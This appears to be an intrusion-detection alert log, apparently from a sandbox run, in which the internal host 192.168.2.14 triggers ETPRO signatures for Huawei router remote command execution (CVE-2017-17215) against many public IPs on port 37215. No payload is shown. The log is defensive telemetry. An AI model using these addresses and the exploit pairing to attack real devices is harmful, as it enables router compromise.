                                                    07/10/24-08:26:13.824053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773637215192.168.2.14157.75.140.249
                                                    07/10/24-08:27:22.806136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372637215192.168.2.1441.108.253.70
                                                    07/10/24-08:27:31.538711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378237215192.168.2.14184.220.100.37
                                                    07/10/24-08:26:26.432231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375837215192.168.2.14157.19.54.119
                                                    07/10/24-08:27:14.672861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018237215192.168.2.14197.148.24.182
                                                    07/10/24-08:27:24.871352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581237215192.168.2.14197.247.46.209
                                                    07/10/24-08:26:28.649292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310037215192.168.2.1441.132.202.220
                                                    07/10/24-08:26:38.624233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460437215192.168.2.14197.27.100.45
                                                    07/10/24-08:26:23.296739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167437215192.168.2.1441.157.129.28
                                                    07/10/24-08:27:20.512534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942637215192.168.2.14218.214.26.136
                                                    07/10/24-08:26:36.402150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975437215192.168.2.1441.127.69.39
                                                    07/10/24-08:27:02.857366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791037215192.168.2.1427.208.138.110
                                                    07/10/24-08:26:45.644371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596037215192.168.2.14157.143.204.24
                                                    07/10/24-08:27:05.189042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567437215192.168.2.14157.242.14.200
                                                    07/10/24-08:26:36.418170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5909037215192.168.2.14197.108.0.156
                                                    07/10/24-08:27:23.948745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498237215192.168.2.148.48.222.163
                                                    07/10/24-08:26:52.068814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746037215192.168.2.14197.11.4.141
                                                    07/10/24-08:26:11.583025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564637215192.168.2.14170.185.174.63
                                                    07/10/24-08:26:14.770458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918437215192.168.2.1441.151.191.37
                                                    07/10/24-08:26:13.851676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876837215192.168.2.14157.162.228.212
                                                    07/10/24-08:27:17.044301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396237215192.168.2.1441.55.163.150
                                                    07/10/24-08:27:02.894714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770237215192.168.2.14197.252.249.173
                                                    07/10/24-08:26:34.260009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951837215192.168.2.14157.208.212.147
                                                    07/10/24-08:26:45.648834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559037215192.168.2.1441.28.181.205
                                                    07/10/24-08:26:47.824141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568237215192.168.2.14173.201.190.239
                                                    07/10/24-08:26:11.493465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488037215192.168.2.1437.145.73.193
                                                    07/10/24-08:26:36.340754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4566437215192.168.2.1441.108.159.184
                                                    07/10/24-08:27:08.415369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683837215192.168.2.1497.21.24.90
                                                    07/10/24-08:27:28.165793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826437215192.168.2.14157.19.92.114
                                                    07/10/24-08:27:22.794160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862237215192.168.2.1441.80.105.233
                                                    07/10/24-08:26:47.939278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876237215192.168.2.1441.149.170.147
                                                    07/10/24-08:27:07.366647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899837215192.168.2.14157.21.97.156
                                                    07/10/24-08:27:24.981479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4594037215192.168.2.1441.251.249.205
                                                    07/10/24-08:26:55.456990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734437215192.168.2.14197.114.26.16
                                                    07/10/24-08:27:28.139469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240037215192.168.2.14197.105.109.223
                                                    07/10/24-08:26:28.647124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644437215192.168.2.1441.199.238.59
                                                    07/10/24-08:26:17.981355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720037215192.168.2.14168.174.248.59
                                                    07/10/24-08:27:20.475094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993037215192.168.2.1441.8.183.126
                                                    07/10/24-08:26:20.157992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881237215192.168.2.1441.232.254.127
                                                    07/10/24-08:26:38.518951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285037215192.168.2.14154.126.174.229
                                                    07/10/24-08:27:24.963171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960637215192.168.2.1471.233.185.114
                                                    07/10/24-08:26:14.816754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816237215192.168.2.1441.16.250.241
                                                    07/10/24-08:26:22.278115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793437215192.168.2.149.199.128.37
                                                    07/10/24-08:27:02.985576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280037215192.168.2.1441.130.40.118
                                                    07/10/24-08:27:28.179860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810437215192.168.2.14157.198.114.141
                                                    07/10/24-08:27:05.089807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288637215192.168.2.1441.220.32.84
                                                    07/10/24-08:26:13.655669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106037215192.168.2.1441.56.53.244
                                                    07/10/24-08:26:38.631405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965437215192.168.2.14157.243.122.232
                                                    07/10/24-08:26:43.665744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575037215192.168.2.1436.245.171.34
                                                    07/10/24-08:27:19.330211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822437215192.168.2.14141.151.94.252
                                                    07/10/24-08:26:14.824786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724037215192.168.2.14157.217.221.4
                                                    07/10/24-08:27:11.557326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587037215192.168.2.14197.11.16.179
                                                    07/10/24-08:26:45.633104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770237215192.168.2.14197.122.192.5
                                                    07/10/24-08:26:28.736884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732237215192.168.2.14157.90.73.9
                                                    07/10/24-08:27:23.965193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765037215192.168.2.14157.21.89.42
                                                    07/10/24-08:26:25.453696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498037215192.168.2.1441.240.250.153
                                                    07/10/24-08:26:20.153663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759437215192.168.2.14157.159.170.160
                                                    07/10/24-08:26:14.732568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355437215192.168.2.14168.44.206.101
                                                    07/10/24-08:27:07.264352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537237215192.168.2.1453.197.142.76
                                                    07/10/24-08:26:34.229279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253837215192.168.2.14213.105.60.186
                                                    07/10/24-08:27:14.903189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476837215192.168.2.1441.106.100.17
                                                    07/10/24-08:26:45.598078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760037215192.168.2.1441.63.143.9
                                                    07/10/24-08:26:57.670723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928037215192.168.2.14197.159.210.187
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709837215192.168.2.1444.21.131.81
                                                    07/10/24-08:27:02.716869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921237215192.168.2.1441.98.69.161
                                                    07/10/24-08:26:15.868019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789037215192.168.2.1466.94.36.210
                                                    07/10/24-08:27:13.752380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755637215192.168.2.14200.45.254.154
                                                    07/10/24-08:26:29.780436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066037215192.168.2.14157.215.47.55
                                                    07/10/24-08:27:23.505996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492637215192.168.2.1441.15.229.42
                                                    07/10/24-08:26:13.754443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470437215192.168.2.1458.216.141.54
                                                    07/10/24-08:27:30.510800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677237215192.168.2.14197.14.60.228
                                                    07/10/24-08:27:31.565038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505637215192.168.2.14197.178.223.202
                                                    07/10/24-08:27:22.909155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907237215192.168.2.14114.164.247.127
                                                    07/10/24-08:26:31.056369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000837215192.168.2.14157.21.228.253
                                                    07/10/24-08:26:28.906271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353237215192.168.2.14106.9.219.154
                                                    07/10/24-08:26:25.469425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415237215192.168.2.1441.143.67.29
                                                    07/10/24-08:27:22.912600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842437215192.168.2.1444.7.171.249
                                                    07/10/24-08:26:57.672388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735837215192.168.2.1432.28.48.172
                                                    07/10/24-08:26:11.116791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067037215192.168.2.14197.190.231.229
                                                    07/10/24-08:26:29.866987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434637215192.168.2.14197.147.39.18
                                                    07/10/24-08:26:31.081950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434037215192.168.2.14208.136.27.245
                                                    07/10/24-08:26:57.565173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556237215192.168.2.1448.253.2.87
                                                    07/10/24-08:27:13.894673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5457037215192.168.2.1441.234.15.198
                                                    07/10/24-08:26:28.825249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981837215192.168.2.1460.196.5.192
                                                    07/10/24-08:27:13.990716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822237215192.168.2.14129.82.21.120
                                                    07/10/24-08:26:28.630891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362437215192.168.2.14197.222.216.72
                                                    07/10/24-08:26:33.243765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669637215192.168.2.14157.213.65.237
                                                    07/10/24-08:27:22.861030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643837215192.168.2.14175.182.171.146
                                                    07/10/24-08:26:49.830587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641037215192.168.2.14157.219.159.8
                                                    07/10/24-08:26:43.726781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559837215192.168.2.14197.163.21.53
                                                    07/10/24-08:26:26.535495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643237215192.168.2.1441.86.103.221
                                                    07/10/24-08:27:27.158777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507437215192.168.2.1441.229.171.252
                                                    07/10/24-08:26:11.115626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743237215192.168.2.1441.189.159.169
                                                    07/10/24-08:27:22.866153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734637215192.168.2.14197.115.63.104
                                                    07/10/24-08:26:36.406551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835637215192.168.2.1444.104.91.108
                                                    07/10/24-08:27:10.537865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4143037215192.168.2.14157.245.183.131
                                                    07/10/24-08:26:55.433645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240437215192.168.2.1496.218.159.227
                                                    07/10/24-08:26:11.491653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515437215192.168.2.14111.12.69.255
                                                    07/10/24-08:26:11.595600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952237215192.168.2.14157.45.111.206
                                                    07/10/24-08:26:22.297520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484437215192.168.2.1441.208.45.166
                                                    07/10/24-08:26:49.904329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981637215192.168.2.1441.157.223.252
                                                    07/10/24-08:27:05.228923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4069437215192.168.2.14197.75.102.201
                                                    07/10/24-08:27:27.132803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163237215192.168.2.14149.98.80.143
                                                    07/10/24-08:27:13.857509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034837215192.168.2.1446.133.126.23
                                                    07/10/24-08:26:33.221493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765837215192.168.2.14157.188.91.91
                                                    07/10/24-08:27:27.155945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827637215192.168.2.1441.87.42.237
                                                    07/10/24-08:27:14.841554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581437215192.168.2.1441.168.93.134
                                                    07/10/24-08:27:30.527827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703637215192.168.2.14160.165.103.66
                                                    07/10/24-08:26:43.763647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300437215192.168.2.14197.206.73.100
                                                    07/10/24-08:26:26.437394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745837215192.168.2.14106.134.171.11
                                                    07/10/24-08:26:42.373871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309037215192.168.2.14197.64.45.99
                                                    07/10/24-08:26:25.505039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457637215192.168.2.1431.119.150.19
                                                    07/10/24-08:26:55.296464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640837215192.168.2.14157.118.240.26
                                                    07/10/24-08:27:14.839974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668237215192.168.2.1441.107.69.35
                                                    07/10/24-08:26:11.178484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619437215192.168.2.14157.29.80.97
                                                    07/10/24-08:26:36.416041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4145637215192.168.2.14157.53.7.108
                                                    07/10/24-08:27:23.497299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115837215192.168.2.1441.130.233.218
                                                    07/10/24-08:26:26.437789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541237215192.168.2.14116.117.166.55
                                                    07/10/24-08:27:22.930500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469837215192.168.2.14150.235.144.231
                                                    07/10/24-08:26:26.527286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520037215192.168.2.1441.28.116.215
                                                    07/10/24-08:26:34.187121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556237215192.168.2.14157.155.64.234
                                                    07/10/24-08:26:43.806576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4151237215192.168.2.1420.203.74.142
                                                    07/10/24-08:27:14.879570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519637215192.168.2.14157.141.106.193
                                                    07/10/24-08:26:48.006424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186437215192.168.2.14135.115.199.31
                                                    07/10/24-08:27:02.922365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434437215192.168.2.14160.27.35.109
                                                    07/10/24-08:27:02.982637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4819437215192.168.2.1441.221.134.100
                                                    07/10/24-08:27:33.825878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272037215192.168.2.14197.193.180.17
                                                    07/10/24-08:26:31.110182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309437215192.168.2.14157.141.134.73
                                                    07/10/24-08:27:05.217430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3811637215192.168.2.14197.206.193.219
                                                    07/10/24-08:26:20.128775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014837215192.168.2.1441.5.228.35
                                                    07/10/24-08:26:14.814573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328637215192.168.2.14157.70.238.225
                                                    07/10/24-08:27:32.569844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453637215192.168.2.1441.248.27.72
                                                    07/10/24-08:26:43.549542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652437215192.168.2.14197.229.7.112
                                                    07/10/24-08:27:08.379030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312637215192.168.2.1441.77.224.152
                                                    07/10/24-08:26:28.935220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586637215192.168.2.14119.104.152.101
                                                    07/10/24-08:27:27.084495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916837215192.168.2.14157.10.174.163
                                                    07/10/24-08:26:59.856754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546837215192.168.2.14157.223.251.205
                                                    07/10/24-08:26:28.917896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575837215192.168.2.14197.10.70.58
                                                    07/10/24-08:26:31.099427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388237215192.168.2.1441.235.242.18
                                                    07/10/24-08:27:33.845766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497237215192.168.2.1441.57.224.136
                                                    07/10/24-08:26:43.582733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839037215192.168.2.1419.21.253.163
                                                    07/10/24-08:26:11.480134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321237215192.168.2.1441.236.232.103
                                                    07/10/24-08:26:22.296944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990637215192.168.2.14157.93.89.228
                                                    07/10/24-08:26:57.562580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590437215192.168.2.1441.92.168.92
                                                    07/10/24-08:26:41.350291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306237215192.168.2.14157.88.224.188
                                                    07/10/24-08:26:53.150508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584837215192.168.2.14121.169.96.166
                                                    07/10/24-08:26:15.875738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278237215192.168.2.1479.11.44.193
                                                    07/10/24-08:26:34.217028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905037215192.168.2.1441.220.193.132
                                                    07/10/24-08:27:27.132803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152237215192.168.2.14197.246.105.159
                                                    07/10/24-08:26:52.001475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625437215192.168.2.1441.128.100.127
                                                    07/10/24-08:26:59.646410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792437215192.168.2.14197.45.106.116
                                                    07/10/24-08:26:43.662238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629837215192.168.2.14157.225.82.169
                                                    07/10/24-08:26:11.550760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148237215192.168.2.14157.52.65.140
                                                    07/10/24-08:26:15.821130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4399837215192.168.2.1441.239.82.233
                                                    07/10/24-08:27:27.041359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540637215192.168.2.14197.26.131.43
                                                    07/10/24-08:27:17.077286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347637215192.168.2.14197.201.131.48
                                                    07/10/24-08:27:20.405672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233837215192.168.2.14197.73.83.1
                                                    07/10/24-08:27:24.944052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5466237215192.168.2.14157.134.77.136
                                                    07/10/24-08:26:43.681536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881837215192.168.2.14201.210.41.81
                                                    07/10/24-08:26:14.809992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257837215192.168.2.14200.85.31.170
                                                    07/10/24-08:26:34.188180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901237215192.168.2.1441.12.158.234
                                                    07/10/24-08:26:47.860875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694837215192.168.2.14157.7.33.184
                                                    07/10/24-08:26:17.939708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265837215192.168.2.14157.204.47.255
                                                    07/10/24-08:27:19.279611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043037215192.168.2.14117.9.244.199
                                                    07/10/24-08:27:20.465194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5830237215192.168.2.14194.35.124.161
                                                    07/10/24-08:26:22.294435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750237215192.168.2.14157.50.173.87
                                                    07/10/24-08:27:33.762956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557037215192.168.2.14157.64.12.128
                                                    07/10/24-08:26:55.385824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934837215192.168.2.14132.91.11.188
                                                    07/10/24-08:27:22.828817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865037215192.168.2.14219.77.85.61
                                                    07/10/24-08:26:33.247887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638237215192.168.2.1441.205.210.157
                                                    07/10/24-08:26:42.394014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913837215192.168.2.14197.36.70.201
                                                    07/10/24-08:26:11.551318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659237215192.168.2.14157.16.97.14
                                                    07/10/24-08:27:17.096498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745837215192.168.2.1441.231.25.94
                                                    07/10/24-08:27:10.629470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794637215192.168.2.14157.49.65.232
                                                    07/10/24-08:26:43.856431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959237215192.168.2.14197.78.255.63
                                                    07/10/24-08:27:13.879424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160437215192.168.2.14197.24.218.129
                                                    07/10/24-08:27:13.880072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473637215192.168.2.14166.16.236.45
                                                    07/10/24-08:26:59.853365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3666437215192.168.2.14197.73.120.140
                                                    07/10/24-08:26:14.775624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372837215192.168.2.14157.151.54.36
                                                    07/10/24-08:27:19.145980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018637215192.168.2.1441.10.89.83
                                                    07/10/24-08:26:52.062166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864037215192.168.2.14129.216.39.228
                                                    07/10/24-08:27:28.151143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269237215192.168.2.1441.13.1.219
                                                    07/10/24-08:26:13.824785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771037215192.168.2.14157.190.3.221
                                                    07/10/24-08:26:31.069487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635837215192.168.2.142.157.255.116
                                                    07/10/24-08:27:05.064753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5234837215192.168.2.142.147.63.202
